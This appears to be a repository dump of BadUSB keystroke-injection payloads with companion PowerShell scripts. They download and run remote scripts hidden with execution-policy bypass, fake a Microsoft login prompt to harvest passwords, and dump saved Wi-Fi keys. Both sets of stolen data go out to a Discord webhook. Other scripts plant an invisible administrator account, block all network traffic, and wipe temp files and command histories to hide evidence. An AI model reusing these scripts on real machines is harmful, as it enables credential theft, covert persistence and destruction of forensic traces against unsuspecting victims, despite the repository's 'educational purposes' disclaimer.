├── BadUSB ├── payload_uploader │ ├── Dropbox import tuto │ │ └── README.MD │ ├── payload_uploader.txt │ └── README.md ├── Get-UserPassword │ ├── Get-UserPassword.txt │ └── Get-UserPassword.ps1 ├── Get-WifiPasswords-to-DiscordWebhook │ ├── Get-WifiPasswords-to-DiscordWebhook.txt │ ├── README.MD │ └── Get-WifiPasswords-to-DiscordWebhook.ps1 ├── Block-NetworkConnection │ └── Block-NetworkConnection.txt └── Add-Invisible-Admin-Account │ ├── Add-Invisible-Admin-Account.txt │ └── Add-Invisible-Admin-Account.ps1 └── README.md /BadUSB/payload_uploader/Dropbox import tuto/README.MD: -------------------------------------------------------------------------------- 1 | # Steps to have dropbox link for the uploader🐬 2 | 1. Connect to https://www.dropbox.com/login or create an account 3 | 2. Click on Import Button and import you .PS1 file 4 | 3. When your .PS1 file is uploaded select it & click on "Copy Link" 5 | 4. You will have an url like this https://www.dropbox.com/s/mq96dsiofzgdsq/MyPowershellfile.ps1?dl=0 6 | 5. Change it to (?dl=1 at the end of the url) 7 | https://www.dropbox.com/s/mq96dsiofzgdsq/MyPowershellfile.ps1?dl=1 8 | 6. Now, you can use this link in your BadUsb payload (.txt file) -------------------------------------------------------------------------------- /BadUSB/payload_uploader/payload_uploader.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Get-UserPassword/Get-UserPassword.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/yourshare_url?dl=1 -o "c:\windows\temp\your_script_name.ps1"; invoke-expression "c:\windows\temp\your_script_name.ps1" 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/Get-WifiPasswords-to-DiscordWebhook.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/yourshare_url?dl=1 -o "c:\windows\temp\your_script_name.ps1"; invoke-expression "c:\windows\temp\your_script_name.ps1" 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Block-NetworkConnection/Block-NetworkConnection.txt: -------------------------------------------------------------------------------- 1 | REM Title: Block All Trafic 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will Block all inbound & outbound connexion on user device 6 | REM 7 | REM Start powershell as admin 8 | GUI r 9 | DELAY 500 10 | STRING powershell.exe Start-Process powershell -Verb runAs 11 | DELAY 500 12 | ENTER 13 | DELAY 2000 14 | LEFT 15 | DELAY 500 16 | ENTER 17 | DELAY 500 18 | STRING New-NetFirewallRule -DisplayName "Block All Connections" -Direction Outbound -Action Block;New-NetFirewallRule -DisplayName "Block All Connections" -Direction inbound -Action Block 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | STRING exit 23 | DELAY 500 24 | ENTER 25 | 26 | -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/README.MD: -------------------------------------------------------------------------------- 1 |

Wifi Stealer V2 with Exfiltration via Discord Webhook

2 | 3 | 4 |

5 | 6 |

7 | 8 | **This payload will retrieve the different wifi networks saved on the computer as well as the security keys registered. 9 | It will then send via a discord webhook the different information retrieved.** 10 | 11 | ------------ 12 | 13 | ## Features 14 | notes: Code need to be UTF8-BOM encoded 15 | - It can manage the output of the netsh command if the output is in French or English 16 | - Output is sent in nice Formatted Embed 17 | - Takes into account Wi-Fi without a security key 18 | 19 | ![output](https://i.imgur.com/p1vBYqW.jpg "output") 20 | -------------------------------------------------------------------------------- /BadUSB/Add-Invisible-Admin-Account/Add-Invisible-Admin-Account.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | REM Start powershell as admin 12 | GUI r 13 | DELAY 500 14 | STRING powershell.exe Start-Process powershell -Verb runAs 15 | DELAY 500 16 | ENTER 17 | DELAY 2000 18 | LEFT 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr "DROPBOX_URL" -Outfile "c:\windows\temp\Add-Invisible-Admin-Account.ps1"; invoke-expression "c:\windows\temp\Add-Invisible-Admin-Account.ps1" 23 | DELAY 500 24 | ENTER 25 | 26 | -------------------------------------------------------------------------------- /BadUSB/payload_uploader/README.md: -------------------------------------------------------------------------------- 1 | # Paramètres et description de l'uploader 2 | 3 | | Paramètre | Description | 4 | | ----------------- | ----------- | 5 | | `powershell` | Commande pour lancer Windows PowerShell | 6 | | `-w h` | Définit la largeur du terminal à une hauteur maximale | 7 | | `-NoP` | Désactive la protection du script | 8 | | `-NonI` | Désactive les interactions de l'interface utilisateur | 9 | | `-Exec Bypass` | Autorise l'exécution de scripts non signés | 10 | | `iwr` | Alias pour Invoke-WebRequest pour télécharger le fichier | 11 | | `https://www.dropbox.com/s/yourshare_url?dl=1` | URL pour télécharger le fichier script | 12 | | `-o "c:\windows\temp\your_script_name.ps1"` | Spécifie l'emplacement où le fichier script doit être enregistré | 13 | | `invoke-expression` | Exécute un script PowerShell | 14 | | `"c:\windows\temp\your_script_name.ps1"` | Emplacement du fichier script téléchargé | 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 | Kira 4 |

5 | 6 |

7 | Kira 8 |

9 | 10 |

11 | 12 |

13 | 14 | >DISCLAIMER: This repository is for educational purposes only and is not intended for real-world usage. The creators of this repository 15 | are not responsible for any harm or damage that may occur as a result of using the information or code provided in this repository. 16 | By accessing and using this repository, you acknowledge and agree that you do so at your own risk. 17 | 18 | 19 |

20 | kira's github stats 21 |

22 | -------------------------------------------------------------------------------- /BadUSB/Add-Invisible-Admin-Account/Add-Invisible-Admin-Account.ps1: -------------------------------------------------------------------------------- 1 | # Create a new user 2 | net user microsoft microsoft /add 3 | 4 | #Get local admin group name 5 | $LocalAdminGroupName = gwmi win32_group -filter "LocalAccount = $TRUE And SID = 'S-1-5-32-544'" | select -expand name 6 | 7 | # Add this user to the localgroup "Administrators" 8 | net localgroup $LocalAdminGroupName microsoft /add 9 | 10 | # Make this user invisible 11 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v microsoft /t REG_DWORD /d 0 /f 12 | 13 | # Set interactive logon on: Don't display last signed-in to allow you to connect to invisible account 14 | New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name dontdisplaylastusername -PropertyType DWORD -Value 1 -Force 15 | 16 | # empty temp folder 17 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 18 | 19 | # delete run box history 20 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 21 | 22 | # Delete powershell history 23 | Remove-Item (Get-PSreadlineOption).HistorySavePath 24 | 25 | # Empty recycle bin 26 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue 27 | -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/Get-WifiPasswords-to-DiscordWebhook.ps1: -------------------------------------------------------------------------------- 1 | #Webhook URL 2 | $webhookUri = "YOUR DISCORD WEBHOOK" 3 | 4 | #Get List of SSIDS 5 | $SSIDS = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+" | Where-Object {$_ -ne ""} 6 | 7 | #initiate Embed Array var 8 | [System.Collections.ArrayList]$embedArray = @() 9 | $description = "" 10 | $color = "4289797" 11 | 12 | #A loop to get password for each SSID 13 | $WifiInfo = foreach($SSID in $SSIDS) { 14 | 15 | # Check if output is in French or English 16 | $output = netsh wlan show profiles name="$SSID" key=clear 17 | 18 | #Embed Title 19 | $title = "EXFILTRATED FROM COMPUTER : " + $env:computername 20 | 21 | #IF Output of netsh is french 22 | if ($output -match "Paramètres de sécurité"){ 23 | 24 | #IF output have a password key 25 | if ($output -match "Contenu de la clé" ){ 26 | $Password = ($output | Select-String 'Contenu de la clé') -replace ".*:\s+" 27 | $description = "**Network:** " + $SSID + " 28 | **Password:** " + $Password 29 | }else{ 30 | $description = "**Network:** " + $SSID + " 31 | **Password:** No Password" 32 | } 33 | 34 | } 35 | 36 | 37 | #IF Output of netsh is English 38 | if ($output -match "Security settings"){ 39 | 40 | #IF output have a password key 41 | if ($output -match "Key Content"){ 42 | $Password = ($output | Select-String 'Key Content') -replace ".*:\s+" 43 | $description = "**Network:** " + $SSID + " 44 | **Password:** " + $Password 45 | }else{ 46 | $description = "**Network:** " + $SSID + " 47 | **Password:** No Password" 48 | } 49 | 50 | } 51 | 52 | #Create Embed Object 53 | $embedObject = [PSCustomObject]@{ 54 | color = $color 55 | title = $title 56 | description = $description 57 | } 58 | 59 | #Add Object to Array 60 | $embedArray.Add($embedObject) 61 | 62 | #Creating the embed 63 | $payload = [PSCustomObject]@{ 64 | embeds = $embedArray 65 | } 66 | 67 | 68 | 69 | } 70 | #Send data using REST method 71 | Invoke-RestMethod -Uri $webHookUri -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json' -------------------------------------------------------------------------------- /BadUSB/Get-UserPassword/Get-UserPassword.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# 3 | .SYNOPSIS 4 | This script is meant to trick your target into sharing their credentials through a fake authentication pop up message 5 | original script by jakobi : https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Credz-Plz 6 | Reworked by Kira 7 | .DESCRIPTION 8 | A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" 9 | This will be followed by a fake authentication ui prompt. 10 | If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up 11 | Once the target enters their credentials their information will be uploaded to Discord webhook for collection 12 | 13 | 14 | #> 15 | 16 | #------------------------------------------------------------------------------------------------------------------------------------ 17 | 18 | $dc = "YOUR DISCORD WEBHOOK" 19 | 20 | #------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | 23 | #initiate Embed Array var 24 | [System.Collections.ArrayList]$embedArray = @() 25 | $description = "" 26 | $color = "4289797" 27 | 28 | #------------------------------------------------------------------------------------------------------------------------------------ 29 | 30 | <# 31 | 32 | .NOTES 33 | This is to generate the ui.prompt you will use to harvest their credentials 34 | #> 35 | 36 | function Get-Creds { 37 | $form = $null 38 | 39 | while ($form -eq $null) 40 | { 41 | $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); 42 | $cred.getnetworkcredential().password 43 | 44 | if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) 45 | { 46 | Add-Type -AssemblyName PresentationCore,PresentationFramework 47 | $msgBody = "Credentials cannot be empty!" 48 | $msgTitle = "Error" 49 | $msgButton = 'Ok' 50 | $msgImage = 'Stop' 51 | $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) 52 | Write-Host "The user clicked: $Result" 53 | $form = $null 54 | } 55 | 56 | else{ 57 | $creds = $cred.GetNetworkCredential() | fl 58 | return $creds 59 | } 60 | } 61 | 62 | } 63 | #---------------------------------------------------------------------------------------------------- 64 | 65 | <# 66 | 67 | .NOTES 68 | This is to pause the script until a mouse movement is detected 69 | #> 70 | function Pause-Script{ 71 | Add-Type -AssemblyName System.Windows.Forms 72 | $originalPOS = [System.Windows.Forms.Cursor]::Position.X 73 | $o=New-Object -ComObject WScript.Shell 74 | 75 | while (1) { 76 | $pauseTime = 3 77 | if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ 78 | break 79 | } 80 | else { 81 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime 82 | } 83 | } 84 | } 85 | #---------------------------------------------------------------------------------------------------- 86 | 87 | # This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off 88 | function Caps-Off { 89 | Add-Type -AssemblyName System.Windows.Forms 90 | $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') 91 | 92 | #If true, toggle CapsLock key, to ensure that the script doesn't fail 93 | if ($caps -eq $true){ 94 | 95 | $key = New-Object -ComObject WScript.Shell 96 | $key.SendKeys('{CapsLock}') 97 | } 98 | } 99 | #---------------------------------------------------------------------------------------------------- 100 | 101 | <# 102 | 103 | .NOTES 104 | This is to call the function to pause the script until a mouse movement is detected then activate the pop-up 105 | #> 106 | Pause-Script 107 | Caps-Off 108 | Add-Type -AssemblyName PresentationCore,PresentationFramework 109 | $msgBody = "Please authenticate your Microsoft Account." 110 | $msgTitle = "Authentication Required" 111 | $msgButton = 'Ok' 112 | $msgImage = 'Warning' 113 | $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) 114 | Write-Host "The user clicked: $Result" 115 | $creds = Get-Creds 116 | 117 | #------------------------------------------------------------------------------------------------------------------------------------ 118 | 119 | #------------------------------------------------------------------------------------------------------------------------------------ 120 | 121 | 122 | $title = "EXFILTRATED FROM COMPUTER : " + $env:computername 123 | $description = "**User:** " + [Environment]::UserDomainName+'\'+[Environment]::UserName + " 124 | **Password:** " + $creds[0] 125 | 126 | 127 | #Create Embed Object 128 | $embedObject = [PSCustomObject]@{ 129 | color = $color 130 | title = $title 131 | description = $description 132 | } 133 | 134 | #Add Object to Array 135 | $embedArray.Add($embedObject) 136 | 137 | #Creating the embed 138 | $payload = [PSCustomObject]@{ 139 | embeds = $embedArray 140 | } 141 | 142 | #Send data using REST method 143 | Invoke-RestMethod -Uri $dc -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json' 144 | 145 | 146 | #------------------------------------------------------------------------------------------------------------------------------------ 147 | 148 | <# 149 | 150 | .NOTES 151 | This is to clean up behind you and remove any evidence to prove you were there 152 | 153 | #> 154 | # Delete contents of Temp folder 155 | try { 156 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 157 | rm c:\windows\temp\* -r -Force -ErrorAction SilentlyContinue 158 | } catch { 159 | Write-Error "Error deleting contents of Temp folder: $($_.Exception.Message)" 160 | } 161 | 162 | # Delete run box history 163 | try { 164 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 165 | } catch { 166 | Write-Error "Error deleting run box history: $($_.Exception.Message)" 167 | } 168 | 169 | # Delete powershell history 170 | try { 171 | Remove-Item (Get-PSreadlineOption).HistorySavePath 172 | } catch { 173 | Write-Error "Error deleting PowerShell history: $($_.Exception.Message)" 174 | } 175 | 176 | # Deletes contents of recycle bin 177 | try { 178 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue 179 | } catch { 180 | Write-Error "Error deleting contents of recycle bin: $($_.Exception.Message)" 181 | } 182 | exit 183 | 184 | 185 | --------------------------------------------------------------------------------